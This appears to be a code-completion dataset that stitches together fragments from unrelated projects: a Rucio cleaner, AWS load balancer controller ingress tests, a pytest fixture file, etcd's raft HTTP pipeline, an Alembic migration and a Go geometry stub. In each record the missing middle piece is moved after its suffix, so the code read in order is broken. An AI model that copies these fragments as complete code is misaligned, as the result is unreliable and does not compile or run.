client_time, db_time = datetime.utcnow(), get_db_time()
max_offset = timedelta(hours=1, seconds=10)
if db_time - client_time > max_offset or client_time - db_time > max_offset:
logging.critical('Offset between client and db time too big. Stopping Cleaner')
return
hostname = socket.gethostname()
sanity_check(executable='rucio-judge-cleaner', hostname=hostname)
if once:
rule_cleaner(once)
else:
logging.info('Cleaner starting %s threads' % str(threads))
threads = [threading.Thread(target=rule_cleaner, kwargs={'once': once}) for i in xrange(0, threads)]
[t.start() for t in threads]
# Interruptible joins require a timeout.
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
| stop |
vanilla_ingress_test.go | package ingress
import (
"context"
"fmt"
awssdk "github.com/aws/aws-sdk-go/aws"
"github.com/gavv/httpexpect/v2"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
corev1 "k8s.io/api/core/v1"
networking "k8s.io/api/networking/v1beta1"
apierrs "k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/util/intstr"
"net/http"
"sigs.k8s.io/aws-load-balancer-controller/pkg/k8s"
"sigs.k8s.io/aws-load-balancer-controller/test/framework"
"sigs.k8s.io/aws-load-balancer-controller/test/framework/fixture"
"sigs.k8s.io/aws-load-balancer-controller/test/framework/manifest"
"sigs.k8s.io/aws-load-balancer-controller/test/framework/utils"
"time"
)
var _ = Describe("vanilla ingress tests", func() {
var (
ctx context.Context
// sandbox namespace
sandboxNS *corev1.Namespace
)
BeforeEach(func() {
ctx = context.Background()
if tf.Options.ControllerImage != "" {
By(fmt.Sprintf("ensure cluster installed with controller: %s", tf.Options.ControllerImage), func() {
tf.CTRLInstallationManager.UpgradeController(tf.Options.ControllerImage)
time.Sleep(60 * time.Second)
})
}
By("setup sandbox namespace", func() {
tf.Logger.Info("allocating namespace")
ns, err := tf.NSManager.AllocateNamespace(ctx, "aws-lb-e2e")
Expect(err).NotTo(HaveOccurred())
tf.Logger.Info("allocated namespace", "name", ns.Name)
sandboxNS = ns
})
})
AfterEach(func() {
if sandboxNS != nil {
By("teardown sandbox namespace", func() {
{
tf.Logger.Info("deleting namespace", "name", sandboxNS.Name)
err := tf.K8sClient.Delete(ctx, sandboxNS)
Expect(err).Should(SatisfyAny(BeNil(), Satisfy(apierrs.IsNotFound)))
tf.Logger.Info("deleted namespace", "name", sandboxNS.Name)
}
{
tf.Logger.Info("waiting namespace becomes deleted", "name", sandboxNS.Name)
err := tf.NSManager.WaitUntilNamespaceDeleted(ctx, sandboxNS)
Expect(err).NotTo(HaveOccurred())
tf.Logger.Info("namespace becomes deleted", "name", sandboxNS.Name)
}
})
}
})
Context("with basic settings", func() {
It("[ingress-class] with IngressClass configured with 'ingress.k8s.aws/alb' controller, one ALB shall be created and functional", func() {
appBuilder := manifest.NewFixedResponseServiceBuilder()
ingBuilder := manifest.NewIngressBuilder()
dp, svc := appBuilder.Build(sandboxNS.Name, "app")
ingBackend := networking.IngressBackend{ServiceName: svc.Name, ServicePort: intstr.FromInt(80)}
ingClass := &networking.IngressClass{
ObjectMeta: metav1.ObjectMeta{
Name: sandboxNS.Name,
},
Spec: networking.IngressClassSpec{
Controller: "ingress.k8s.aws/alb",
},
}
ing := ingBuilder.
AddHTTPRoute("", networking.HTTPIngressPath{Path: "/path", Backend: ingBackend}).
WithIngressClassName(ingClass.Name).
WithAnnotations(map[string]string{
"alb.ingress.kubernetes.io/scheme": "internet-facing",
}).Build(sandboxNS.Name, "ing")
resStack := fixture.NewK8SResourceStack(tf, dp, svc, ingClass, ing)
resStack.Setup(ctx)
defer resStack.TearDown(ctx)
lbARN, lbDNS := ExpectOneLBProvisionedForIngress(ctx, tf, ing)
// test traffic
ExpectLBDNSBeAvailable(ctx, tf, lbARN, lbDNS)
httpExp := httpexpect.New(tf.Logger, fmt.Sprintf("http://%v", lbDNS))
httpExp.GET("/path").Expect().
Status(http.StatusOK).
Body().Equal("Hello World!")
})
It("with 'kubernetes.io/ingress.class' annotation set to 'alb', one ALB shall be created and functional", func() {
appBuilder := manifest.NewFixedResponseServiceBuilder()
ingBuilder := manifest.NewIngressBuilder()
dp, svc := appBuilder.Build(sandboxNS.Name, "app")
ingBackend := networking.IngressBackend{ServiceName: svc.Name, ServicePort: intstr.FromInt(80)}
ing := ingBuilder.
AddHTTPRoute("", networking.HTTPIngressPath{Path: "/path", Backend: ingBackend}).
WithAnnotations(map[string]string{
"kubernetes.io/ingress.class": "alb",
"alb.ingress.kubernetes.io/scheme": "internet-facing",
}).Build(sandboxNS.Name, "ing")
resStack := fixture.NewK8SResourceStack(tf, dp, svc, ing)
resStack.Setup(ctx)
defer resStack.TearDown(ctx)
lbARN, lbDNS := ExpectOneLBProvisionedForIngress(ctx, tf, ing)
// test traffic
ExpectLBDNSBeAvailable(ctx, tf, lbARN, lbDNS)
httpExp := httpexpect.New(tf.Logger, fmt.Sprintf("http://%v", lbDNS))
httpExp.GET("/path").Expect().
Status(http.StatusOK).
Body().Equal("Hello World!")
})
})
Context("with IngressClass variant settings", func() {
It("[ingress-class] with IngressClass configured with 'nginx' controller, no ALB shall be created", func() {
appBuilder := manifest.NewFixedResponseServiceBuilder()
ingBuilder := manifest.NewIngressBuilder()
dp, svc := appBuilder.Build(sandboxNS.Name, "app")
ingBackend := networking.IngressBackend{ServiceName: svc.Name, ServicePort: intstr.FromInt(80)}
ingClass := &networking.IngressClass{
ObjectMeta: metav1.ObjectMeta{
Name: sandboxNS.Name,
},
Spec: networking.IngressClassSpec{
Controller: "kubernetes.io/nginx",
},
}
ing := ingBuilder.
AddHTTPRoute("", networking.HTTPIngressPath{Path: "/path", Backend: ingBackend}).
WithIngressClassName(ingClass.Name).
WithAnnotations(map[string]string{
"alb.ingress.kubernetes.io/scheme": "internet-facing",
}).Build(sandboxNS.Name, "ing")
resStack := fixture.NewK8SResourceStack(tf, dp, svc, ingClass, ing)
resStack.Setup(ctx)
defer resStack.TearDown(ctx)
ExpectNoLBProvisionedForIngress(ctx, tf, ing)
})
It("with 'kubernetes.io/ingress.class' annotation set to 'nginx', no ALB shall be created", func() {
appBuilder := manifest.NewFixedResponseServiceBuilder()
ingBuilder := manifest.NewIngressBuilder()
dp, svc := appBuilder.Build(sandboxNS.Name, "app")
ingBackend := networking.IngressBackend{ServiceName: svc.Name, ServicePort: intstr.FromInt(80)}
ing := ingBuilder.
AddHTTPRoute("", networking.HTTPIngressPath{Path: "/path", Backend: ingBackend}).
WithAnnotations(map[string]string{
"kubernetes.io/ingress.class": "nginx",
"alb.ingress.kubernetes.io/scheme": "internet-facing",
}).Build(sandboxNS.Name, "ing")
resStack := fixture.NewK8SResourceStack(tf, dp, svc, ing)
resStack.Setup(ctx)
defer resStack.TearDown(ctx)
ExpectNoLBProvisionedForIngress(ctx, tf, ing)
})
It("without IngressClass or 'kubernetes.io/ingress.class' annotation, no ALB shall be created", func() {
appBuilder := manifest.NewFixedResponseServiceBuilder()
ingBuilder := manifest.NewIngressBuilder()
dp, svc := appBuilder.Build(sandboxNS.Name, "app")
ingBackend := networking.IngressBackend{ServiceName: svc.Name, ServicePort: intstr.FromInt(80)}
ing := ingBuilder.
AddHTTPRoute("", networking.HTTPIngressPath{Path: "/path", Backend: ingBackend}).
WithAnnotations(map[string]string{
"alb.ingress.kubernetes.io/scheme": "internet-facing",
}).Build(sandboxNS.Name, "ing")
resStack := fixture.NewK8SResourceStack(tf, dp, svc, ing)
resStack.Setup(ctx)
defer resStack.TearDown(ctx)
ExpectNoLBProvisionedForIngress(ctx, tf, ing)
})
})
Context("with `alb.ingress.kubernetes.io/load-balancer-name` variant settings", func() {
It("with 'alb.ingress.kubernetes.io/load-balancer-name' annotation explicitly specified, one ALB shall be created and functional", func() {
appBuilder := manifest.NewFixedResponseServiceBuilder()
ingBuilder := manifest.NewIngressBuilder()
dp, svc := appBuilder.Build(sandboxNS.Name, "app")
ingBackend := networking.IngressBackend{ServiceName: svc.Name, ServicePort: intstr.FromInt(80)}
lbName := fmt.Sprintf("%.16s-%.15s", tf.Options.ClusterName, sandboxNS.Name)
ing := ingBuilder.
AddHTTPRoute("", networking.HTTPIngressPath{Path: "/path", Backend: ingBackend}).
WithAnnotations(map[string]string{
"kubernetes.io/ingress.class": "alb",
"alb.ingress.kubernetes.io/scheme": "internet-facing",
"alb.ingress.kubernetes.io/load-balancer-name": lbName,
}).Build(sandboxNS.Name, "ing")
resStack := fixture.NewK8SResourceStack(tf, dp, svc, ing)
resStack.Setup(ctx)
defer resStack.TearDown(ctx)
lbARN, lbDNS := ExpectOneLBProvisionedForIngress(ctx, tf, ing)
sdkLB, err := tf.LBManager.GetLoadBalancerFromARN(ctx, lbARN)
Expect(err).NotTo(HaveOccurred())
Expect(awssdk.StringValue(sdkLB.LoadBalancerName)).Should(Equal(lbName))
// test traffic
ExpectLBDNSBeAvailable(ctx, tf, lbARN, lbDNS)
httpExp := httpexpect.New(tf.Logger, fmt.Sprintf("http://%v", lbDNS))
httpExp.GET("/path").Expect().
Status(http.StatusOK).
Body().Equal("Hello World!")
})
})
Context("with ALB IP targets and named target port", func() {
It("with 'alb.ingress.kubernetes.io/target-type' annotation explicitly specified, one ALB shall be created and functional", func() {
appBuilder := manifest.NewFixedResponseServiceBuilder().WithTargetPortName("e2e-targetport")
ingBuilder := manifest.NewIngressBuilder()
dp, svc := appBuilder.Build(sandboxNS.Name, "app")
ingBackend := networking.IngressBackend{ServiceName: svc.Name, ServicePort: intstr.FromInt(80)}
ing := ingBuilder.
AddHTTPRoute("", networking.HTTPIngressPath{Path: "/path", Backend: ingBackend}).
WithAnnotations(map[string]string{
"kubernetes.io/ingress.class": "alb",
"alb.ingress.kubernetes.io/scheme": "internet-facing",
"alb.ingress.kubernetes.io/target-type": "ip",
}).Build(sandboxNS.Name, "ing")
resStack := fixture.NewK8SResourceStack(tf, dp, svc, ing)
resStack.Setup(ctx)
defer resStack.TearDown(ctx)
lbARN, lbDNS := ExpectOneLBProvisionedForIngress(ctx, tf, ing)
// test traffic
ExpectLBDNSBeAvailable(ctx, tf, lbARN, lbDNS)
httpExp := httpexpect.New(tf.Logger, fmt.Sprintf("http://%v", lbDNS))
httpExp.GET("/path").Expect().
Status(http.StatusOK).
Body().Equal("Hello World!")
})
})
Context("with `alb.ingress.kubernetes.io/actions.${action-name}` variant settings", func() {
It("with annotation based actions, one ALB shall be created and functional", func() {
appBuilder := manifest.NewFixedResponseServiceBuilder()
ingBuilder := manifest.NewIngressBuilder()
dp1, svc1 := appBuilder.WithHTTPBody("app-1").Build(sandboxNS.Name, "app-1")
dp2, svc2 := appBuilder.WithHTTPBody("app-2").Build(sandboxNS.Name, "app-2")
ingResponse503Backend := networking.IngressBackend{ServiceName: "response-503", ServicePort: intstr.FromString("use-annotation")}
ingRedirectToAWSBackend := networking.IngressBackend{ServiceName: "redirect-to-aws", ServicePort: intstr.FromString("use-annotation")}
ingForwardSingleTGBackend := networking.IngressBackend{ServiceName: "forward-single-tg", ServicePort: intstr.FromString("use-annotation")}
ingForwardMultipleTGBackend := networking.IngressBackend{ServiceName: "forward-multiple-tg", ServicePort: intstr.FromString("use-annotation")}
ing := ingBuilder.
AddHTTPRoute("", networking.HTTPIngressPath{Path: "/response-503", Backend: ingResponse503Backend}).
AddHTTPRoute("", networking.HTTPIngressPath{Path: "/redirect-to-aws", Backend: ingRedirectToAWSBackend}).
AddHTTPRoute("", networking.HTTPIngressPath{Path: "/forward-single-tg", Backend: ingForwardSingleTGBackend}).
AddHTTPRoute("", networking.HTTPIngressPath{Path: "/forward-multiple-tg", Backend: ingForwardMultipleTGBackend}).
WithAnnotations(map[string]string{
"kubernetes.io/ingress.class": "alb",
"alb.ingress.kubernetes.io/scheme": "internet-facing",
"alb.ingress.kubernetes.io/actions.response-503": "{\"type\":\"fixed-response\",\"fixedResponseConfig\":{\"contentType\":\"text/plain\",\"statusCode\":\"503\",\"messageBody\":\"503 error text\"}}",
"alb.ingress.kubernetes.io/actions.redirect-to-aws": "{\"type\":\"redirect\",\"redirectConfig\":{\"host\":\"aws.amazon.com\",\"path\":\"/eks/\",\"port\":\"443\",\"protocol\":\"HTTPS\",\"query\":\"k=v\",\"statusCode\":\"HTTP_302\"}}",
"alb.ingress.kubernetes.io/actions.forward-single-tg": "{\"type\":\"forward\",\"forwardConfig\":{\"targetGroups\":[{\"serviceName\":\"app-1\",\"servicePort\":\"80\"}]}}",
"alb.ingress.kubernetes.io/actions.forward-multiple-tg": "{\"type\":\"forward\",\"forwardConfig\":{\"targetGroups\":[{\"serviceName\":\"app-1\",\"servicePort\":\"80\",\"weight\":20},{\"serviceName\":\"app-2\",\"servicePort\":80,\"weight\":80}],\"targetGroupStickinessConfig\":{\"enabled\":true,\"durationSeconds\":200}}}",
}).Build(sandboxNS.Name, "ing")
resStack := fixture.NewK8SResourceStack(tf, dp1, svc1, dp2, svc2, ing)
resStack.Setup(ctx)
defer resStack.TearDown(ctx)
lbARN, lbDNS := ExpectOneLBProvisionedForIngress(ctx, tf, ing)
// test traffic
ExpectLBDNSBeAvailable(ctx, tf, lbARN, lbDNS)
httpExp := httpexpect.New(tf.Logger, fmt.Sprintf("http://%v", lbDNS))
httpExp.GET("/response-503").Expect().
Status(http.StatusServiceUnavailable).
Body().Equal("503 error text")
httpExp.GET("/redirect-to-aws").WithRedirectPolicy(httpexpect.DontFollowRedirects).Expect().
Status(http.StatusFound).
Header("Location").Equal("https://aws.amazon.com:443/eks/?k=v")
httpExp.GET("/forward-single-tg").Expect().
Status(http.StatusOK).
Body().Equal("app-1")
httpExp.GET("/forward-multiple-tg").Expect().
Status(http.StatusOK).
Body().Match("app-1|app-2")
})
})
Context("with `alb.ingress.kubernetes.io/conditions.${conditions-name}` variant settings", func() {
It("with annotation based conditions, one ALB shall be created and functional", func() {
ingBuilder := manifest.NewIngressBuilder()
ingRulePath1Backend := networking.IngressBackend{ServiceName: "rule-path1", ServicePort: intstr.FromString("use-annotation")}
ingRulePath2Backend := networking.IngressBackend{ServiceName: "rule-path2", ServicePort: intstr.FromString("use-annotation")}
ingRulePath3Backend := networking.IngressBackend{ServiceName: "rule-path3", ServicePort: intstr.FromString("use-annotation")}
ingRulePath4Backend := networking.IngressBackend{ServiceName: "rule-path4", ServicePort: intstr.FromString("use-annotation")}
ingRulePath5Backend := networking.IngressBackend{ServiceName: "rule-path5", ServicePort: intstr.FromString("use-annotation")}
ingRulePath6Backend := networking.IngressBackend{ServiceName: "rule-path6", ServicePort: intstr.FromString("use-annotation")}
ingRulePath7Backend := networking.IngressBackend{ServiceName: "rule-path7", ServicePort: intstr.FromString("use-annotation")}
ing := ingBuilder.
AddHTTPRoute("www.example.com", networking.HTTPIngressPath{Path: "/path1", Backend: ingRulePath1Backend}).
AddHTTPRoute("www.example.com", networking.HTTPIngressPath{Path: "/path2", Backend: ingRulePath2Backend}).
AddHTTPRoute("www.example.com", networking.HTTPIngressPath{Path: "/path3", Backend: ingRulePath3Backend}).
AddHTTPRoute("www.example.com", networking.HTTPIngressPath{Path: "/path4", Backend: ingRulePath4Backend}).
AddHTTPRoute("www.example.com", networking.HTTPIngressPath{Path: "/path5", Backend: ingRulePath5Backend}).
AddHTTPRoute("www.example.com", networking.HTTPIngressPath{Path: "/path6", Backend: ingRulePath6Backend}).
AddHTTPRoute("www.example.com", networking.HTTPIngressPath{Path: "/path7", Backend: ingRulePath7Backend}).
WithAnnotations(map[string]string{
"kubernetes.io/ingress.class": "alb",
"alb.ingress.kubernetes.io/scheme": "internet-facing",
"alb.ingress.kubernetes.io/actions.rule-path1": "{\"type\":\"fixed-response\",\"fixedResponseConfig\":{\"contentType\":\"text/plain\",\"statusCode\":\"200\",\"messageBody\":\"Host is www.example.com OR anno.example.com\"}}",
"alb.ingress.kubernetes.io/conditions.rule-path1": "[{\"field\":\"host-header\",\"hostHeaderConfig\":{\"values\":[\"anno.example.com\"]}}]",
"alb.ingress.kubernetes.io/actions.rule-path2": "{\"type\":\"fixed-response\",\"fixedResponseConfig\":{\"contentType\":\"text/plain\",\"statusCode\":\"200\",\"messageBody\":\"Path is /path2 OR /anno/path2\"}}",
"alb.ingress.kubernetes.io/conditions.rule-path2": "[{\"field\":\"path-pattern\",\"pathPatternConfig\":{\"values\":[\"/anno/path2\"]}}]",
"alb.ingress.kubernetes.io/actions.rule-path3": "{\"type\":\"fixed-response\",\"fixedResponseConfig\":{\"contentType\":\"text/plain\",\"statusCode\":\"200\",\"messageBody\":\"Http header HeaderName is HeaderValue1 OR HeaderValue2\"}}",
"alb.ingress.kubernetes.io/conditions.rule-path3": "[{\"field\":\"http-header\",\"httpHeaderConfig\":{\"httpHeaderName\": \"HeaderName\", \"values\":[\"HeaderValue1\", \"HeaderValue2\"]}}]",
"alb.ingress.kubernetes.io/actions.rule-path4": "{\"type\":\"fixed-response\",\"fixedResponseConfig\":{\"contentType\":\"text/plain\",\"statusCode\":\"200\",\"messageBody\":\"Http request method is GET OR HEAD\"}}",
"alb.ingress.kubernetes.io/conditions.rule-path4": "[{\"field\":\"http-request-method\",\"httpRequestMethodConfig\":{\"Values\":[\"GET\", \"HEAD\"]}}]",
"alb.ingress.kubernetes.io/actions.rule-path5": "{\"type\":\"fixed-response\",\"fixedResponseConfig\":{\"contentType\":\"text/plain\",\"statusCode\":\"200\",\"messageBody\":\"Query string is paramA:valueA1 OR paramA:valueA2\"}}",
"alb.ingress.kubernetes.io/conditions.rule-path5": "[{\"field\":\"query-string\",\"queryStringConfig\":{\"values\":[{\"key\":\"paramA\",\"value\":\"valueA1\"},{\"key\":\"paramA\",\"value\":\"valueA2\"}]}}]",
"alb.ingress.kubernetes.io/actions.rule-path6": "{\"type\":\"fixed-response\",\"fixedResponseConfig\":{\"contentType\":\"text/plain\",\"statusCode\":\"200\",\"messageBody\":\"Source IP is 192.168.0.0/16 OR 172.16.0.0/16\"}}",
"alb.ingress.kubernetes.io/conditions.rule-path6": "[{\"field\":\"source-ip\",\"sourceIpConfig\":{\"values\":[\"192.168.0.0/16\", \"172.16.0.0/16\"]}}]",
"alb.ingress.kubernetes.io/actions.rule-path7": "{\"type\":\"fixed-response\",\"fixedResponseConfig\":{\"contentType\":\"text/plain\",\"statusCode\":\"200\",\"messageBody\":\"multiple conditions applies\"}}",
"alb.ingress.kubernetes.io/conditions.rule-path7": "[{\"field\":\"http-header\",\"httpHeaderConfig\":{\"httpHeaderName\": \"HeaderName\", \"values\":[\"HeaderValue\"]}},{\"field\":\"query-string\",\"queryStringConfig\":{\"values\":[{\"key\":\"paramA\",\"value\":\"valueA\"}]}},{\"field\":\"query-string\",\"queryStringConfig\":{\"values\":[{\"key\":\"paramB\",\"value\":\"valueB\"}]}}]",
}).Build(sandboxNS.Name, "ing")
resStack := fixture.NewK8SResourceStack(tf, ing)
resStack.Setup(ctx)
defer resStack.TearDown(ctx)
lbARN, lbDNS := ExpectOneLBProvisionedForIngress(ctx, tf, ing)
// test traffic
ExpectLBDNSBeAvailable(ctx, tf, lbARN, lbDNS)
httpExp := httpexpect.New(tf.Logger, fmt.Sprintf("http://%v", lbDNS))
httpExp.GET("/path1").WithHost("www.example.com").Expect().
Status(http.StatusOK).
Body().Equal("Host is www.example.com OR anno.example.com")
httpExp.GET("/path1").WithHost("anno.example.com").Expect().
Status(http.StatusOK).
Body().Equal("Host is www.example.com OR anno.example.com")
httpExp.GET("/path1").WithHost("other.example.com").Expect().
Status(http.StatusNotFound)
httpExp.GET("/path2").WithHost("www.example.com").Expect().
Status(http.StatusOK).
Body().Equal("Path is /path2 OR /anno/path2")
httpExp.GET("/anno/path2").WithHost("www.example.com").Expect().
Status(http.StatusOK).
Body().Equal("Path is /path2 OR /anno/path2")
httpExp.GET("/other/path2").WithHost("www.example.com").Expect().
Status(http.StatusNotFound)
httpExp.GET("/path3").WithHost("www.example.com").WithHeader("HeaderName", "HeaderValue1").Expect().
Status(http.StatusOK).
Body().Equal("Http header HeaderName is HeaderValue1 OR HeaderValue2")
httpExp.GET("/path3").WithHost("www.example.com").WithHeader("HeaderName", "HeaderValue2").Expect().
Status(http.StatusOK).
Body().Equal("Http header HeaderName is HeaderValue1 OR HeaderValue2")
httpExp.GET("/path3").WithHost("www.example.com").WithHeader("HeaderName", "HeaderValue3").Expect().
Status(http.StatusNotFound)
httpExp.GET("/path3").WithHost("www.example.com").Expect().
Status(http.StatusNotFound)
httpExp.GET("/path4").WithHost("www.example.com").Expect().
Status(http.StatusOK).
Body().Equal("Http request method is GET OR HEAD")
httpExp.HEAD("/path4").WithHost("www.example.com").Expect().
Status(http.StatusOK)
httpExp.POST("/path4").WithHost("www.example.com").Expect().
Status(http.StatusNotFound)
httpExp.GET("/path5").WithHost("www.example.com").WithQuery("paramA", "valueA1").Expect().
Status(http.StatusOK).
Body().Equal("Query string is paramA:valueA1 OR paramA:valueA2")
httpExp.GET("/path5").WithHost("www.example.com").WithQuery("paramA", "valueA2").Expect().
Status(http.StatusOK).
Body().Equal("Query string is paramA:valueA1 OR paramA:valueA2")
httpExp.GET("/path5").WithHost("www.example.com").WithQuery("paramA", "valueA3").Expect().
Status(http.StatusNotFound)
httpExp.GET("/path6").WithHost("www.example.com").Expect().
Status(http.StatusNotFound)
httpExp.GET("/path7").WithHost("www.example.com").
WithHeader("HeaderName", "HeaderValue").
WithQuery("paramA", "valueA").WithQuery("paramB", "valueB").Expect().
Status(http.StatusOK).
Body().Equal("multiple conditions applies")
httpExp.GET("/path7").WithHost("www.example.com").
WithHeader("HeaderName", "OtherHeaderValue").
WithQuery("paramA", "valueA").WithQuery("paramB", "valueB").Expect().
Status(http.StatusNotFound)
httpExp.GET("/path7").WithHost("www.example.com").
WithHeader("HeaderName", "HeaderValue").
WithQuery("paramA", "valueB").WithQuery("paramB", "valueB").Expect().
Status(http.StatusNotFound)
})
})
})
// ExpectOneLBProvisionedForIngress expects one LoadBalancer provisioned for Ingress.
func ExpectOneLBProvisionedForIngress(ctx context.Context, tf *framework.Framework, ing *networking.Ingress) (lbARN string, lbDNS string) {
Eventually(func(g Gomega) {
err := tf.K8sClient.Get(ctx, k8s.NamespacedName(ing), ing)
g.Expect(err).NotTo(HaveOccurred())
lbDNS = FindIngressDNSName(ing)
g.Expect(lbDNS).ShouldNot(BeEmpty())
}, utils.IngressReconcileTimeout, utils.PollIntervalShort).Should(Succeed())
tf.Logger.Info("ingress DNS populated", "dnsName", lbDNS)
var err error
lbARN, err = tf.LBManager.FindLoadBalancerByDNSName(ctx, lbDNS)
Expect(err).ShouldNot(HaveOccurred())
tf.Logger.Info("ALB provisioned", "arn", lbARN)
return lbARN, lbDNS
}
// ExpectNoLBProvisionedForIngress expects no LoadBalancer provisioned for Ingress.
func ExpectNoLBProvisionedForIngress(ctx context.Context, tf *framework.Framework, ing *networking.Ingress) {
Consistently(func(g Gomega) {
err := tf.K8sClient.Get(ctx, k8s.NamespacedName(ing), ing)
g.Expect(err).NotTo(HaveOccurred())
lbDNS := FindIngressDNSName(ing)
g.Expect(lbDNS).Should(BeEmpty())
}, utils.IngressReconcileTimeout, utils.PollIntervalShort).Should(Succeed())
}
func | (ctx context.Context, tf *framework.Framework, lbARN string, lbDNS string) {
ctx, cancel := context.WithTimeout(ctx, utils.IngressDNSAvailableWaitTimeout)
defer cancel()
tf.Logger.Info("wait loadBalancer becomes available", "arn", lbARN)
err := tf.LBManager.WaitUntilLoadBalancerAvailable(ctx, lbARN)
Expect(err).NotTo(HaveOccurred())
tf.Logger.Info("loadBalancer becomes available", "arn", lbARN)
tf.Logger.Info("wait dns becomes available", "dns", lbDNS)
err = utils.WaitUntilDNSNameAvailable(ctx, lbDNS)
Expect(err).NotTo(HaveOccurred())
tf.Logger.Info("dns becomes available", "dns", lbDNS)
}
| ExpectLBDNSBeAvailable |
conftest.py | import pytest
import random
import numpy as np
from numpy.random import rand
import lib.algorithms as al
@pytest.fixture(scope="session")
def unif_1D():
"""
Test case: one dimension, samples evenly distributed.
"""
data = np.array([[0], [1], [2], [3], [4], [5], [6],
[7], [8], [9], [10], [11], [12]
]
)
return data
@pytest.fixture(scope="session")
def rng():
return random.Random()
@pytest.fixture
def dataset(rng):
n_samples = rng.randint(100, 1000)
n_features = rng.randint(10, 100)
feature_range = rng.randint(1, 10)
return (rand(n_samples, n_features) - 1/2) * feature_range
|
@pytest.fixture
def FC_random(rng, dataset, nc):
p = 1 + rng.random() * 2
return al.FuzzyClustering(dataset, p, nc)
# @pytest.fixture
# def FCP_random(rng, dataset, nc):
# p = rng.random()
# return al.FuzzyClusteringPoly(dataset, p, nc)
# @pytest.fixture
# def FCRS_random(rng, dataset, nc):
# p = rng.random() * 5
# return al.FuzzyClusteringRegulSh(dataset, p, nc)
# @pytest.fixture
# def FCRQ_random(rng, dataset, nc):
# p = rng.random() * 5
# return al.FuzzyClusteringRegulQuad(dataset, p, nc) | @pytest.fixture
def nc(rng):
return rng.randint(2, 50) |
pipeline.go | // Copyright 2015 The etcd Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package rafthttp
import (
"bytes"
"errors"
"io/ioutil"
"sync"
"time"
"github.com/coreos/etcd/etcdserver/stats"
"github.com/coreos/etcd/pkg/httputil"
"github.com/coreos/etcd/pkg/pbutil"
"github.com/coreos/etcd/pkg/types"
"github.com/coreos/etcd/raft"
"github.com/coreos/etcd/raft/raftpb"
)
const (
connPerPipeline = 4
// pipelineBufSize is the size of pipeline buffer, which helps hold the
// temporary network latency.
// The size ensures that pipeline does not drop messages when the network
// is out of work for less than 1 second in good path.
pipelineBufSize = 64
)
var errStopped = errors.New("stopped")
type pipeline struct {
from, to types.ID
cid types.ID
tr *Transport
picker *urlPicker
status *peerStatus
fs *stats.FollowerStats
r Raft
errorc chan error
msgc chan raftpb.Message
// wait for the handling routines
wg sync.WaitGroup
stopc chan struct{}
}
func newPipeline(tr *Transport, picker *urlPicker, from, to, cid types.ID, status *peerStatus, fs *stats.FollowerStats, r Raft, errorc chan error) *pipeline {
p := &pipeline{
from: from,
to: to,
cid: cid,
tr: tr,
picker: picker,
status: status,
fs: fs,
r: r,
errorc: errorc,
stopc: make(chan struct{}),
msgc: make(chan raftpb.Message, pipelineBufSize),
}
p.wg.Add(connPerPipeline)
for i := 0; i < connPerPipeline; i++ {
go p.handle()
}
return p
}
func (p *pipeline) stop() {
close(p.stopc)
p.wg.Wait()
}
func (p *pipeline) handle() {
defer p.wg.Done()
for {
select {
case m := <-p.msgc:
start := time.Now()
err := p.post(pbutil.MustMarshal(&m))
end := time.Now()
if err != nil {
p.status.deactivate(failureType{source: pipelineMsg, action: "write"}, err.Error())
if m.Type == raftpb.MsgApp && p.fs != nil {
p.fs.Fail()
}
p.r.ReportUnreachable(m.To)
if isMsgSnap(m) { | }
continue
}
p.status.activate()
if m.Type == raftpb.MsgApp && p.fs != nil {
p.fs.Succ(end.Sub(start))
}
if isMsgSnap(m) {
p.r.ReportSnapshot(m.To, raft.SnapshotFinish)
}
sentBytes.WithLabelValues(types.ID(m.To).String()).Add(float64(m.Size()))
case <-p.stopc:
return
}
}
}
// post POSTs a data payload to a url. Returns nil if the POST succeeds,
// error on any failure.
func (p *pipeline) post(data []byte) (err error) {
u := p.picker.pick()
req := createPostRequest(u, RaftPrefix, bytes.NewBuffer(data), "application/protobuf", p.tr.URLs, p.from, p.cid)
done := make(chan struct{}, 1)
cancel := httputil.RequestCanceler(p.tr.pipelineRt, req)
go func() {
select {
case <-done:
case <-p.stopc:
waitSchedule()
cancel()
}
}()
resp, err := p.tr.pipelineRt.RoundTrip(req)
done <- struct{}{}
if err != nil {
p.picker.unreachable(u)
return err
}
b, err := ioutil.ReadAll(resp.Body)
if err != nil {
p.picker.unreachable(u)
return err
}
resp.Body.Close()
err = checkPostResponse(resp, b, req, p.to)
if err != nil {
p.picker.unreachable(u)
// errMemberRemoved is a critical error since a removed member should
// always be stopped. So we use reportCriticalError to report it to errorc.
if err == errMemberRemoved {
reportCriticalError(err, p.errorc)
}
return err
}
return nil
}
// waitSchedule waits other goroutines to be scheduled for a while
func waitSchedule() { time.Sleep(time.Millisecond) } | p.r.ReportSnapshot(m.To, raft.SnapshotFailure) |
156b555e16b7_.py | """empty message
Revision ID: 156b555e16b7
Revises: fc1cedce5988
Create Date: 2020-05-04 10:39:56.803842
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '156b555e16b7'
down_revision = 'fc1cedce5988'
branch_labels = None
depends_on = None
def | ():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('posts', 'author',
existing_type=sa.VARCHAR(length=128),
nullable=False)
op.alter_column('posts', 'description',
existing_type=sa.VARCHAR(length=256),
nullable=False)
op.alter_column('posts', 'title',
existing_type=sa.VARCHAR(length=128),
nullable=False)
op.drop_index('ix_posts_timestamp', table_name='posts')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_index('ix_posts_timestamp', 'posts', ['timestamp'], unique=False)
op.alter_column('posts', 'title',
existing_type=sa.VARCHAR(length=128),
nullable=True)
op.alter_column('posts', 'description',
existing_type=sa.VARCHAR(length=256),
nullable=True)
op.alter_column('posts', 'author',
existing_type=sa.VARCHAR(length=128),
nullable=True)
# ### end Alembic commands ###
| upgrade |
sphere.go | package geometry
import (
"github.com/dlespiau/dax"
"github.com/dlespiau/dax/math"
)
type Sphere struct {
radius float32
nVSegments, nHSegments int
